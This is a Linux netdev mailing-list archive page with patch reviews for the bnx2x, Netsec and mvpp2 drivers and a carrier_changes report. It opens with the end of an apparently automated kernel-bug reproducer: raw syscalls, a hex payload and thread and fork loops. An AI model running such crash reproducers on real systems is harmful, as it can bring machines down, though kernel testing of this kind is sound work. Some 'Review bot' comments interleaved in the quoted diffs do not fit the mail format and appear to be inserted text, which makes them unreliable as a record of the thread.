        "\x89\x6f\x5f\x5b\xf8\x2d\x58\x08\xca\xe2\xa7\xc8\x4a\xf4\x11"
        "\x4d\x97\x1f\xc2\x06\x97\x4a\x0f\xe6\x64\xc6\xf6\xe0\xd1\xee"
        "\x6a\x64\x33\xf1\xf4\xf7\x44\x10\x32\xde\xd4\x17\xf1\xfb\x54"
        "\x3a\x0e\xcc\xca\x37\xc0\x0d\xe5\xc4\x96\xd3\x2d\x6b\xf4\x7b"
        "\x79\x62\xc2\x7a\x44\x31\xc7\x87\x32\xae\x95\x82\xb3\x4c\x26"
        "\x3f\x64\x97\x90\xf5\xfe\xfb\x38\x12\xed\x5f\x98\xf0\x04\x7c"
        "\x15\xed\x60\x50\x8c\x11\xb8\xd3\x29\x0a\x6a\xb3\x2a\x19\x45"
        "\x82\xca\xe0\xf8\x2d\x9d\xc7\x8f\xbf\x3d\x32\x65\x06\xf4\x90"
        "\x6b\x14\x78\xaa\xe1\x3b\xef\xed\xe1\x0d\xe5\x00\xf8\x72\x96"
        "\x83\x1c\x92\xaa\xfd\x02\xe8\x5c\x4a\xe8\x47\xad\x9f\xb7\x20"
        "\x8a\xf6\x2e\x35\x46\x46\x84\x6b\xf4\xe4\x6f\xcd\xc3\xef\x36"
        "\x8e\x21\x02\xf2\x33\xa5\xfe\x7a\x63\x62\x92\x14\xcf\xdf\x02"
        "\x6f\xd3\x79\x8f\x04\x2a\xf8\xe2\x3e\x34\x98\x75\x94\xda\xe8"
        "\xf4\xf8\xdb\x0f\x0b\x42\x0c\x64\xfc\x11\xc8\xc4\x44\x8b\x82"
        "\x23\x27\xe2\xa7\xaa\x28\xbb\x98\xf6\xd3\xad\xdb\xf0\xab\x79"
        "\xee\xb1\x46\x0f\xd1\x15\x82\x41\x04\x44\xe2\xbb\xcb\x1a\xa3"
        "\xac\xdd\x35\x39\x22\xd3\x89\xb9\xbf\x7f\xae\xae\x8a\x8f\xc8"
        "\xcb\x56\x4d\xde\x6a\x5d\xe1\x50\x99\x72\x56\x7b\x84\xc8\x5b"
        "\x5a\x05\xd4\xc1\x5b\x66\x55\x31\x84\x86\x05\x0d\x8a\x2c\xdf"
        "\x28\x30\xa6\x1e\xcc\x2a\x4f\x10\xee\xb7\x16\x89\x80\x05\xae"
        "\x91\xcd\x1f\x97\x28\xe7\xed\x59\x89\xb5\xdd\x5d\x20\x10\x8e"
        "\x80\xab\x63\x25\xa4\x03\x4f\x08\xd2\x5a\xeb\x83\x60\x3a\xb0"
        "\xe4\x49\xd8\x61\x83\x1b\x75\x1f\x6e\x3b\xdb\xb7\x75\x94\x78"
        "\x48\x1d\xc0\x46\x11\xd5\xde\xd4\xef\x4b\xbb\x29\x5a\x75\xb7"
        "\x86\x08\xa6\xbd\x74\xaa\x27\x0f\x6b\x4f\xf0\xca\x7e\x5f\x35"
        "\x4d\xf3\xdb\x4a\x81\xdb\x9c\x75\xe1\x5d\x40\x9f\x8d\x3f\xd0"
        "\x2c\x45\x53\x50\x4e\xfe\x3e\x03\xea\x05\x88\xb1\x06\x79\x86"
        "\x9d\x13\x18\x8d\xa8\xf0\x03\xd4\xc9\x89\x3c\xe2\x45\x22\xf8"
        "\x10\x43\x92\xdb\x3d\xdc\xa0\x89\x57\x8b\x76\x91\x91\x30\xc7"
        "\xde\x51\xf5\x71\x33\x54\xda\x62\xb3\x16\xda\x76\xa4\x32\x87"
        "\xf0\x79\x24\xc0\x6f\x91\x2d\xe9\x34\xd4\x24\x39\x01\xe1\xf2"
        "\x68\x53\xf3\x71\x02\x29\x7d\x84\x64\x02\x77\x18\x0e\xc0\xd1"
        "\xd7\xfe\xd1\xf7\x85\xa0\xbb\x2f\xc4\x63\xad\xc7\x21\xe6\xed"
        "\xa7\xf7\x8a\x72\x90\xd5\x9e\x39\x23\x32\x27\x32\x2e\xaa\xa5"
        "\x67\x9a\xac\xd8\xa4\xd9\x4c\x47\xc2\x38\x6a\x0d\xe7\xee\xef"
        "\xb1\x93\x13\x2a\xce\x9f\x05\x4d\x65\x60\x25\x30\x9f\x67\xac"
        "\x8c\x70\xbd\x48\x76\xad\x97\x9a\x0e\xf5\xf2\xa0\x61\xbc\xdb"
        "\xda\x29\xbe\x14\x18\x18\xaf\xc3\x76\x6d\x92\xc5\xf7\x3e\x4d"
        "\xb4\x26\xdb\x60\x39\x80\xc2\x14\xc5\xe4\x99\x35\x25\xf9\x48"
        "\x72\xd9\x05\x52\x62\x33\x39\xb2\xc7\x06\x18\x8c\x25\xcf\x7b"
        "\xe2\xf4\x5e\xb3\x21\x36\x7e\x0d\x8a\xd4\x7b\x67\x69\x34\xc0"
        "\x3f\x77\x1f\x11\x67\xb5\x57\x5e\x6d\xfe\x97\xf5\xe2\x05\x38"
        "\x41\xda\x7d\x7d\xe8\x77\xab\xdf\x0f\x5a\x00\x60\x47\x34\xda"
        "\xb1\x3d\x09\x65\xe4\xd7\x9f\xbc\xe9\x69\x40\x19\x1d\x4d\x85"
        "\x52\xd6\xa3\x59\xb0\x47\xcb\xc7\x60\x01\x7d\x2e\x36\x50\x39"
        "\x38\x27\x1b\x20\xc7\x65\xb3\xe8\x54\x9b\x65\xbf\x87\x38\x1b"
        "\x57\x10\x58\xa9\x34\x96\x57\x53\xc9\x00\xda\xe4\x9c\x2f\x65"
        "\xbb\x3b\x32\x91\x7c\x0f\xb7\xb6\x1e\xba\x5b\xe0\xb4\xa1\x06"
        "\x63\x70\xba\x55\x7f\x18\x50\xdb\xa5\xa6\x93\x15\x10\x14\x27"
        "\xe2\xee\xd7\x69\x4c\x66\x07\x86\x46\x0f\x2f\x61\x05\x5f\x74"
        "\x58\xa8\x19\x85\x9e\x89\x17\x0f\x96\xea\x65\x0a\xaa\x32\x33"
        "\x15\xca\x5c\x75\xbb\x79\xa9\x1e\xf7\xa1\x2c\x56\xd8\x25\xad"
        "\x91\x0c\x38\x7c\x69\x8c\xda\x14\xac\xc6\xd7\xc7\x62\x62\xf0"
        "\x25\x23\x87\x27\x28\xed\x13\xc2\x98\xe1\x5c\x70\xa3\x32\x94"
        "\x9c\x79\x75\x50\xb5\x48\xcb\x99\xd4\x79\x41\xb8\x1e\xae\x39"
        "\x57\x8f\x88\xb5\x19\x6a\x8e\x07\xca\xf6\xd3\x47\x82\x14\x07"
        "\xfc\x82\x2f\x70\xf1\xf6\x04\xe6\x5d\xf8\x4d\xe8\xb8\x23\xef"
        "\xe4\x79\xf7\x20\x64\x95\x1a\x2d\x8a\x87\x91\x31\x63\xfa\xdc"
        "\xbe\x42\xd1\x5e\x79\x27\x0f\x7b\x3b\x52\xce\xe6\x3b\xd0\x98"
        "\xed\xbb\xc6\x4d\x01\x4c\xf1\x90\xe6\xfe\x7d\x39\x28\xe6\x05"
        "\xd0\xbd\x4e\xcb\x5a\x83\x2b\x7a\x45\xcb\x76\x37\x42\xee\xb9"
        "\xd0\xea\xb8\x0f\x5d\x1a\xf3\x65\x82\x02\xe2\x8d\x6d\x8f\x21"
        "\xf0\xa8\x70\xd6\x36\xde\x09\x95\x90\xa4\x29\xe4\x1c\xf2\x4e"
        "\xa5\x8b\x15\xf0\x9c\xb0\x98\x0f\x82\x73\x2e\x65\x71\x43\x94"
        "\x77\x83\xd6\x81\x6b\xcd\x60\xba\x9f\xfd\x10\x3e\xaa\x01\xf3"
        "\x08\x7e\x55\x85\xba\x91\xc7\xca\x02\x93\x01\xa0\x95\xf8\x56"
        "\x96\xfe\x46\x03\xfd\xfa\x25\xab\x5d\xa3\x2b\xf3\xa4\xd2\x18"
        "\xfa\x1a\xaf\x94\xf4\x51\xef\xea\x79\x20\x13\xee\xff\x33\x35"
        "\xcf\xe8\xb1\x3b\xee\x3c\x7d\xae\xcd\xaa\xea\xd4\xc6\x05\x94"
        "\x01\xbd\xaa\xa6\x5b\x8c\x3d\x99\xcb\x9e\x8f\x2b\xf5\x07\xb9"
        "\x8b\x3c\x87\x08\xb1\x6b\x04\x59\x05\xff\xd4\x1c\x58\x04\xb0"
        "\x96\x37\x14\x5f\x24\x68\x19\x91\x41\x07\x34\x9a\x0b\xd9\xf5"
        "\x07\x35\x0b\xb4\x87\x35\x22\x8d\x47\x9c\x91\x59\x19\xfd\xe8"
        "\xe2\x11\xe6\x1f\xb0\x6e\xa2\xc1\x61\x18\x79\x5a\xcc\x72\x81"
        "\xa5\x47\x2e\x2e\xb0\xd9\x16\x58\x90\xb0\xbf\x02\xd1\x99\x30"
        "\x7a\x5b\x59\xf2\x61\xe5\x0f\x16\x29\x2e\x58\x58\x26\x96\x7f"
        "\xc9",
        4096));
    r[199] = syscall(__NR_writev, r[1], 0x20007000ul, 0x7ul);
    break;
  case 12:
    NONFAILING(*(uint16_t*)0x2001c000 = (uint16_t)0x2);
    NONFAILING(*(uint16_t*)0x2001c002 = (uint16_t)0x224e);
    NONFAILING(*(uint32_t*)0x2001c004 = (uint32_t)0x20000e0);
    NONFAILING(*(uint8_t*)0x2001c008 = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2001c009 = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2001c00a = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2001c00b = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2001c00c = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2001c00d = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2001c00e = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2001c00f = (uint8_t)0x0);
    r[211] = syscall(__NR_connect, r[1], 0x2001c000ul, 0x10ul);
    break;
  }
  return 0;
}

void test()
{
  long i;
  pthread_t th[26];

  memset(r, -1, sizeof(r));
  for (i = 0; i < 13; i++) {
    pthread_create(&th[i], 0, thr, (void*)i);
    usleep(rand() % 10000);
  }
  usleep(rand() % 100000);
}

int main()
{
  int i;
  for (i = 0; i < 4; i++) {
    if (fork() == 0) {
      install_segv_handler();
      use_temporary_dir();
      loop();
      return 0;
    }
  }
  sleep(1000000);
  return 0;
}

^ permalink raw reply

* Re: [PATCH] bnx2x: drop packets where gso_size is too big for hardware
From: Eric Dumazet @ 2017-08-31  6:02 UTC (permalink / raw)
  To: Daniel Axtens
  Cc: netdev, tlfalcon, Yuval.Mintz, ariel.elior, everest-linux-l2,
	jay.vosburgh
In-Reply-To: <20170831054642.13721-1-dja@axtens.net>

On Thu, 2017-08-31 at 15:46 +1000, Daniel Axtens wrote:
> If a bnx2x card is passed a GSO packet with a gso_size larger than
> ~9700 bytes, it will cause a firmware error that will bring the card
> down:
> 
> bnx2x: [bnx2x_attn_int_deasserted3:4323(enP24p1s0f0)]MC assert!
> bnx2x: [bnx2x_mc_assert:720(enP24p1s0f0)]XSTORM_ASSERT_LIST_INDEX 0x2
> bnx2x: [bnx2x_mc_assert:736(enP24p1s0f0)]XSTORM_ASSERT_INDEX 0x0 = 0x00000000 0x25e43e47 0x00463e01 0x00010052
> bnx2x: [bnx2x_mc_assert:750(enP24p1s0f0)]Chip Revision: everest3, FW Version: 7_13_1
> ... (dump of values continues) ...
> 
> Detect when gso_size + header length is greater than the maximum
> packet size (9700 bytes) and drop the packet.
> 
> This raises the obvious question - how do we end up with a packet with
> a gso_size that's greater than 9700? This has been observed on an
> powerpc system when Open vSwitch is forwarding a packet from an
> ibmveth device.
> 
> ibmveth is a bit special. It's the driver for communication between
> virtual machines (aka 'partitions'/LPARs) running under IBM's
> proprietary hypervisor on ppc machines. It allows sending very large
> packets (up to 64kB) between LPARs. This involves some quite
> 'interesting' things: for example, when talking TCP, the MSS is stored
> in the checksum field (see ibmveth_rx_mss_helper() in ibmveth.c).
> 
> Normally on a box like this, there would be a Virtual I/O Server
> (VIOS) partition that owns the physical network card. VIOS lets the
> AIX partitions know when they're talking to a real network and that
> they should drop their MSS. This works fine if VIOS owns the physical
> network card.
> 
> However, in this case, a Linux partition owns the card (this is known
> as a NovaLink setup). The negotiation between VIOS and AIX uses a
> non-standard TCP option, so Linux has never supported that.  Instead,
> Linux just supports receiving large packets. It doesn't support any
> form of messaging/MSS negotiation back to other LPARs.
> 
> To get some clarity about where the large MSS was coming from, I asked
> Thomas Falcon, the maintainer of ibmveth, for some background:
> 
> "In most cases, large segments are an aggregation of smaller packets
> by the Virtual I/O Server (VIOS) partition and then are forwarded to
> the Linux LPAR / ibmveth driver. These segments can be as large as
> 64KB. In this case, since the customer is using Novalink, I believe
> what is happening is pretty straightforward: the large segments are
> created by the AIX partition and then forwarded to the Linux
> partition, ... The ibmveth driver doesn't do any aggregation itself
> but just ensures the proper bits are set before sending the frame up
> to avoid giving the upper layers indigestion."
> 
> It is possible to stop AIX from sending these large segments, but it
> requires configuration on each LPAR. While ibmveth's behaviour is
> admittedly weird, we should fix this here: it shouldn't be possible
> for it to cause a firmware panic on another card.
> 



This is so weird :/

> Cc: Thomas Falcon <tlfalcon@linux.vnet.ibm.com> # ibmveth
> Cc: Yuval Mintz <Yuval.Mintz@cavium.com> # bnx2x
> Thanks-to: Jay Vosburgh <jay.vosburgh@canonical.com> # veth info
> Signed-off-by: Daniel Axtens <dja@axtens.net>
> ---
>  drivers/net/ethernet/broadcom/bnx2x/bnx2x.h      |  2 ++
>  drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c  | 33 +++++++++++++++---------
>  drivers/net/ethernet/broadcom/bnx2x/bnx2x_link.c |  1 -
>  3 files changed, 23 insertions(+), 13 deletions(-)
> 
> diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h
> index 352beff796ae..b36d54737d70 100644
> --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h
> +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h
> @@ -2517,4 +2517,6 @@ void bnx2x_set_rx_ts(struct bnx2x *bp, struct sk_buff *skb);
>   */
>  int bnx2x_vlan_reconfigure_vid(struct bnx2x *bp);
>  
> +#define MAX_PACKET_SIZE	(9700)
> +
>  #endif /* bnx2x.h */
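
Review bot: the new `MAX_PACKET_SIZE` define at the end of bnx2x.h has a very generic name for a header used across the whole driver, and the value carries no comment. Suggest a driver-prefixed name such as `BNX2X_MAX_PACKET_SIZE` and a one-line comment stating that this is the firmware's per-packet limit and whether 9700 includes the headers, since the commit message gives it as "~9700 bytes". The diffstat shows one line removed from bnx2x_link.c; if this is a move of an existing define, the commit message should say so.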
> diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
> index 1216c1f1e052..1c5517a9348c 100644
> --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
> +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
> @@ -3742,6 +3742,7 @@ netdev_tx_t bnx2x_start_xmit(struct sk_buff *skb, struct net_device *dev)
>  	__le16 pkt_size = 0;
>  	struct ethhdr *eth;
>  	u8 mac_type = UNICAST_ADDRESS;
> +	unsigned int pkts_compl = 0, bytes_compl = 0;
>  
>  #ifdef BNX2X_STOP_ON_ERROR
>  	if (unlikely(bp->panic))
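
Review bot: `pkts_compl` and `bytes_compl`, added to the declarations at the top of bnx2x_start_xmit(), have no visible user in the quoted hunks. If they exist only for the `free_and_drop` path that the new check jumps to, declare them in that narrower scope or mention in the commit message what they account for, so the declaration does not read as a leftover.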
> @@ -4029,6 +4030,14 @@ netdev_tx_t bnx2x_start_xmit(struct sk_buff *skb, struct net_device *dev)
>  		   skb->len, hlen, skb_headlen(skb),
>  		   skb_shinfo(skb)->gso_size);
>  
> +		if (unlikely(skb_shinfo(skb)->gso_size + hlen > MAX_PACKET_SIZE)) {
> +			BNX2X_ERR("reported gso segment size plus headers "
> +				  "(%d + %d) > MAX_PACKET_SIZE; dropping pkt!",
> +				  skb_shinfo(skb)->gso_size, hlen);
> +
> +			goto free_and_drop;
> +		}
> +
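
Review bot: the `BNX2X_ERR()` call inside the new `gso_size + hlen > MAX_PACKET_SIZE` branch fires once per dropped packet in the transmit path, so a peer that keeps sending oversized segments can flood the kernel log. Suggest rate limiting the message or counting the drops in a driver statistic instead, and keeping the format string on a single line so it can be grepped.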


If you had this test in bnx2x_features_check(), packet could be
segmented by core networking stack before reaching bnx2x_start_xmit() by
clearing NETIF_F_GSO_MASK

-> No drop would be involved.

check i40evf_features_check() for similar logic.

^ permalink raw reply

* RE: netdev carrier changes is one even after ethernet link up.
From: Bhadram Varka @ 2017-08-31  6:03 UTC (permalink / raw)
  To: andrew@lunn.ch, f.fainelli@gmail.com; +Cc: linux-netdev
In-Reply-To: <974898714b3e4e59b933983ded977ce2@bgmail102.nvidia.com>

+ netdev

From: Bhadram Varka 
Sent: Thursday, August 31, 2017 11:24 AM
To: 'andrew@lunn.ch' <andrew@lunn.ch>; 'f.fainelli@gmail.com' <f.fainelli@gmail.com>
Cc: linux-netdev <netdev@vger.kernel.org>
Subject: netdev carrier changes is one even after ethernet link up.

Hi,

I have observed that carrier_changes is one even when the ethernet link is up.
 
After investigating the code below is my observation -

ethernet_driver_probe()
+--->phy_connect()
|     +--->phy_attach_direct()
|           +---> netif_carrier_off()    : which increments carrier_changes to one.
+--->register_netdevice() : will the carrier_changes becomes zero here ?
+--->netif_carrier_off(): not increment the carrier_changes since __LINK_STATE_NOCARRIER already set.
 
From ethernet driver open will start the PHY and trigger the phy_state_machine.
Phy_state_machine workqueue calling netif_carrier_on() once the link is UP.
netif_carrier_on() increments the carrier_changes by one.
 
After link is UP if we check the carrier_changes sysfs node - it will be one only.
 
$ cat /sys/class/net/eth0/carrier_changes
1
 
After reverting the change - https://lkml.org/lkml/2016/1/9/173 (net: phy: turn carrier off on phy attach) then I could see the carrier changes incremented to 2 after Link UP.
$ cat /sys/class/net/eth0/carrier_changes
2

Thanks,
Bhadram.

^ permalink raw reply

* Re: [net-next PATCHv6 0/2] net: ethernet: Socionext Netsec
From: Jassi Brar @ 2017-08-31  6:31 UTC (permalink / raw)
  To: Florian Fainelli
  Cc: linux-arm-kernel-IAPFreCvJWM7uuMidbF8XUB+6BGkLq7r@public.gmane.org,
	netdev-u79uwXL29TY76Z2rM5mHXA, Devicetree List, David S . Miller,
	Mark Rutland, arnd-r2nGTMty4D4@public.gmane.org,
	patches-QSEj5FYQhm4dnm+yROfE0A@public.gmane.org, Jassi Brar,
	Rob Herring, Andy Green
In-Reply-To: <27A7C5A5-AFF4-49F3-B0DF-7F53283EC2A4-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org>

On Thu, Aug 31, 2017 at 9:36 AM, Florian Fainelli <f.fainelli-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org> wrote:
> On August 30, 2017 3:24:17 AM PDT, Jassi Brar <jassisinghbrar-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org> wrote:
>>Hello,
>>
>>The OGMA/Netsec controller is used in latest SoC from
>>Socionext/Fujitsu.
>>
>>I am refreshing the patchset by basically using official name of the IP
>>from 'OGMA' to 'Netsec'. And the company is renamed too, from Fujitsu
>>to Socionext to better reflect the reality.
>>
>> I have addressed comments (that could be) on the last revision -->
>>https://patchwork.kernel.org/patch/4540651/
>>
>> Of course, I have scanned changes to the drivers/net/ethernet since
>>last submission and integrated whichever applicable and rebased the
>>driver on top of last rc.
>
> It does not appear to be at first glance, but I will just ask anyways, this is not yet another variant of stmmac glued just a little bit differently into the SoC right?
>
Sorry, no idea. I will be glad if we could reuse existing code.

Thanks.
--
To unsubscribe from this list: send the line "unsubscribe devicetree" in
the body of a message to majordomo-u79uwXL29TY76Z2rM5mHXA@public.gmane.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

^ permalink raw reply

* Re: [net-next PATCHv6 2/2] net: socionext: Add NetSec driver
From: Jassi Brar @ 2017-08-31  6:33 UTC (permalink / raw)
  To: Andrew Lunn
  Cc: netdev-u79uwXL29TY76Z2rM5mHXA, Devicetree List,
	linux-arm-kernel-IAPFreCvJWM7uuMidbF8XUB+6BGkLq7r@public.gmane.org,
	David S . Miller, Mark Rutland, arnd-r2nGTMty4D4@public.gmane.org,
	patches-QSEj5FYQhm4dnm+yROfE0A@public.gmane.org, Jassi Brar,
	Rob Herring, Andy Green
In-Reply-To: <20170830171759.GC22289-g2DYL2Zd6BY@public.gmane.org>

On Wed, Aug 30, 2017 at 10:47 PM, Andrew Lunn <andrew-g2DYL2Zd6BY@public.gmane.org> wrote:
>> +static int netsec_mac_update_to_phy_state(struct netsec_priv *priv)
>> +{
>> +     struct phy_device *phydev = priv->ndev->phydev;
>> +     u32 value = 0;
>> +
>> +     value = phydev->duplex ? NETSEC_GMAC_MCR_REG_FULL_DUPLEX_COMMON :
>> +                                    NETSEC_GMAC_MCR_REG_HALF_DUPLEX_COMMON;
>> +
>> +     if (phydev->speed != SPEED_1000)
>> +             value |= NETSEC_MCR_PS;
>> +
>> +     if ((priv->phy_interface != PHY_INTERFACE_MODE_GMII) &&
>> +         (phydev->speed == SPEED_100))
>> +             value |= NETSEC_GMAC_MCR_REG_FES;
>> +
>> +     value |= NETSEC_GMAC_MCR_REG_CST | NETSEC_GMAC_MCR_REG_JE;
>> +
>> +     if (priv->phy_interface == PHY_INTERFACE_MODE_RGMII)
>> +             value |= NETSEC_GMAC_MCR_REG_IBN;
>> +
>> +     if (netsec_mac_write(priv, GMAC_REG_MCR, value))
>> +             return -ETIMEDOUT;
>> +
>> +     priv->actual_link_speed = phydev->speed;
>> +     priv->actual_duplex = phydev->duplex;
>> +     netif_info(priv, drv, priv->ndev, "%s: %uMbps, duplex:%d\n",
>> +                __func__, phydev->speed, phydev->duplex);
>
> phy_print_status()
>
>> +     mac = of_get_mac_address(pdev->dev.of_node);
>> +     if (mac)
>> +             ether_addr_copy(ndev->dev_addr, mac);
>> +
>> +     if (!is_valid_ether_addr(ndev->dev_addr)) {
>> +             eth_hw_addr_random(ndev);
>> +             dev_warn(&pdev->dev, "No MAC address found, using random\n");
>> +     }
>
> So the mac address is optional, unlike what the binding document says.
>
>> +     priv->phy_np = of_parse_phandle(pdev->dev.of_node, "phy-handle", 0);
>> +     if (!priv->phy_np) {
>> +             netif_err(priv, probe, ndev, "missing phy in DT\n");
>
> It is the phy-handle which is missing, not the phy.
>
>> +
>> +     /* MTU range */
>> +     ndev->min_mtu = ETH_MIN_MTU;
>
> No need to set this, it is the default.
>
> Otherwise, this looks good, in terms of phy and mdio.
>
Will fix these.

Thanks.

^ permalink raw reply

* Re: [GIT] Networking
From: Pavel Machek @ 2017-08-31  6:52 UTC (permalink / raw)
  To: Kalle Valo
  Cc: David Miller, xiyou.wangcong, torvalds, akpm, netdev,
	linux-kernel
In-Reply-To: <87fuc8s5v9.fsf@kamboji.qca.qualcomm.com>


On Thu 2017-08-31 07:44:58, Kalle Valo wrote:
> David Miller <davem@davemloft.net> writes:
> 
> > From: Kalle Valo <kvalo@codeaurora.org>
> > Date: Wed, 30 Aug 2017 20:31:31 +0300
> >
> >> AFAICS the bug was introduced by 9df86e2e702c6 back in 2010. If the bug
> >> has been there for 7 years so waiting for a few more weeks should not
> >> hurt.
> >
> > As a maintainer you have a right to handle bug fixing in that way, but
> > certainly that is not how I would handle this.
> >
> > It's easy to validate this fix, it's extremely unlikely to cause
> > a regression, and fixes a problem someone actually was able to
> > trigger.
> >
> > Deferring to -next only has the side effect of making people wait
> > longer for the fix.
> 
> Yeah, you are right there. I did actually ponder which tree I should
> commit it back in July but due to various reasons decided differently.

Can we still get the fix to v4.13-final? :-).

Thanks,
									Pavel
-- 
(english) http://www.livejournal.com/~pavelmachek
(cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html


^ permalink raw reply

* [PATCH net-next 0/3] net: mvpp2: optional PHYs and GoP link irq
From: Antoine Tenart @ 2017-08-31  7:12 UTC (permalink / raw)
  To: davem
  Cc: Antoine Tenart, andrew, gregory.clement, thomas.petazzoni, nadavh,
	linux, linux-kernel, mw, stefanc, miquel.raynal, netdev

Hi all,

This series aims at making the driver work when no PHY is connected
between a port and the physical layer and not described as a fixed-phy.
This is useful for some usecases such as when a switch is connected
directly to the serdes lanes. It can also be used for SFP ports on the
7k-db and 8k-db while waiting for the phylink support to land in (which
should be part of another series).

This series makes the phy optional in the PPv2 driver, and then adds
the support for the GoP port link interrupt to handle link status
changes on such ports.

This was tested using the SFP ports on the 7k-db and 8k-db boards.

Thanks!
Antoine

Antoine Tenart (3):
  net: mvpp2: make the phy optional
  net: mvpp2: use the GoP interrupt for link status changes
  Documentation/bindings: net: marvell-pp2: add the link interrupt

 .../devicetree/bindings/net/marvell-pp2.txt        |   2 +-
 drivers/net/ethernet/marvell/mvpp2.c               | 208 +++++++++++++++++++--
 2 files changed, 196 insertions(+), 14 deletions(-)

-- 
2.13.5

^ permalink raw reply

* [PATCH net-next 1/3] net: mvpp2: make the phy optional
From: Antoine Tenart @ 2017-08-31  7:12 UTC (permalink / raw)
  To: davem
  Cc: Antoine Tenart, andrew, gregory.clement, thomas.petazzoni, nadavh,
	linux, linux-kernel, mw, stefanc, miquel.raynal, netdev
In-Reply-To: <20170831071256.18416-1-antoine.tenart@free-electrons.com>

There is not necessarily a PHY between the GoP and the physical port.
However, the driver currently makes the "phy" property mandatory,
contrary to what is stated in the device tree bindings. This patch makes
the PHY optional, and aligns the PPv2 driver on its device tree
documentation. However if a PHY is provided, the GoP link interrupt
won't be used.

With this patch switches directly connected to the serdes lanes and SFP
ports on the Armada 8040-db and Armada 7040-db can be used if the link
interrupt is described in the device tree.

Signed-off-by: Antoine Tenart <antoine.tenart@free-electrons.com>
Tested-by: Marcin Wojtas <mw@semihalf.com>
---
 drivers/net/ethernet/marvell/mvpp2.c | 19 +++++++++++--------
 1 file changed, 11 insertions(+), 8 deletions(-)

diff --git a/drivers/net/ethernet/marvell/mvpp2.c b/drivers/net/ethernet/marvell/mvpp2.c
index 9e64b1ba3d43..1916a4035ea0 100644
--- a/drivers/net/ethernet/marvell/mvpp2.c
+++ b/drivers/net/ethernet/marvell/mvpp2.c
@@ -6484,7 +6484,8 @@ static void mvpp2_start_dev(struct mvpp2_port *port)
 
 	mvpp2_port_mii_set(port);
 	mvpp2_port_enable(port);
-	phy_start(ndev->phydev);
+	if (ndev->phydev)
+		phy_start(ndev->phydev);
 	netif_tx_start_all_queues(port->dev);
 }
 
@@ -6510,7 +6511,8 @@ static void mvpp2_stop_dev(struct mvpp2_port *port)
 
 	mvpp2_egress_disable(port);
 	mvpp2_port_disable(port);
-	phy_stop(ndev->phydev);
+	if (ndev->phydev)
+		phy_stop(ndev->phydev);
 	phy_power_off(port->comphy);
 }
 
@@ -6567,6 +6569,10 @@ static int mvpp2_phy_connect(struct mvpp2_port *port)
 {
 	struct phy_device *phy_dev;
 
+	/* No PHY is attached */
+	if (!port->phy_node)
+		return 0;
+
 	phy_dev = of_phy_connect(port->dev, port->phy_node, mvpp2_link_event, 0,
 				 port->phy_interface);
 	if (!phy_dev) {
@@ -6587,6 +6593,9 @@ static void mvpp2_phy_disconnect(struct mvpp2_port *port)
 {
 	struct net_device *ndev = port->dev;
 
+	if (!ndev->phydev)
+		return;
+
 	phy_disconnect(ndev->phydev);
 }
 
@@ -7375,12 +7384,6 @@ static int mvpp2_port_probe(struct platform_device *pdev,
 		return -ENOMEM;
 
 	phy_node = of_parse_phandle(port_node, "phy", 0);
-	if (!phy_node) {
-		dev_err(&pdev->dev, "missing phy\n");
-		err = -ENODEV;
-		goto err_free_netdev;
-	}
-
 	phy_mode = of_get_phy_mode(port_node);
 	if (phy_mode < 0) {
 		dev_err(&pdev->dev, "incorrect phy mode\n");
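Review bot: removing the `if (!phy_node)` error path in mvpp2_port_probe() means a port node with neither a "phy" property nor a link interrupt now probes without any diagnostic. The commit message says PHY-less ports can be used only if the link interrupt is described in the device tree, so suggest warning or failing the probe when both are absent. The remaining context also shows the phy mode is still mandatory, which deserves a sentence in the commit message.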
-- 
2.13.5

^ permalink raw reply related

